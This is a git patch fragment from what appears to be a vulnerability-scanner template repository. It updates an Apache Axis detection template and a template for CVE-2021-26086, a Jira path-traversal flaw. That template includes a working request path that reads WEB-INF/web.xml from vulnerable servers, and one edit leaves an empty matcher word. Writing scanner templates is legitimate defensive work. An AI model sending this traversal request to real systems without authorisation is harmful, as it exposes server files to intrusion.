03a5506ec6..2c9733d95c 100644 --- a/technologies/apache-axis-detect.yaml +++ b/technologies/apache-axis-detect.yaml @@ -5,14 +5,15 @@ info: author: dogasantos severity: info description: Axis and Axis2 detection - tags: axis2,middleware + tags: tech,axis2,middleware,apache requests: - method: GET path: + - "{{BaseURL}}" - "{{BaseURL}}/axis2/" - "{{BaseURL}}/axis/" - - "{{BaseURL}}/" + matchers-condition: and matchers: - type: word @@ -24,6 +25,7 @@ requests: - "installation" - "Admin" condition: and + - type: status status: - 200 From 9ada252cdbb41a4281b9bc395b79da24f8cb9646 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 26 Aug 2021 15:25:05 +0530 Subject: [PATCH 51/52] misc update --- cves/2021/CVE-2021-26086.yaml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-26086.yaml b/cves/2021/CVE-2021-26086.yaml index b92aada5f3..5e33e1cde4 100644 --- a/cves/2021/CVE-2021-26086.yaml +++ b/cves/2021/CVE-2021-26086.yaml @@ -13,14 +13,17 @@ info: requests: - method: GET path: - - "{{BaseURL}}/s/xxx/_/;/WEB-INF/web.xml" + - "{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml" matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - - "JiraImportProgressFilter" + - "" part: body + condition: and From 7a2138a8c809326e586a28e977bfb841ba28354d Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 26 Aug 2021 15:27:01 +0530 Subject: [PATCH 52/52] few updates --- cves/2021/CVE-2021-26086.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-26086.yaml b/cves/2021/CVE-2021-26086.yaml index 5e33e1cde4..d0462007ca 100644 --- a/cves/2021/CVE-2021-26086.yaml +++ b/cves/2021/CVE-2021-26086.yaml @@ -1,11 +1,11 @@ id: CVE-2021-26086 info: - name: Jira Limited Remote File Read + name: Jira Limited Local File Read author: cocxanh severity: medium description: Affected versions of Atlassian Jira Server and Data Center allow remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint. - reference: | + reference: - https://jira.atlassian.com/browse/JRASERVER-72695 - https://nvd.nist.gov/vuln/detail/CVE-2021-26086 tags: cve,cve2021,jira,lfi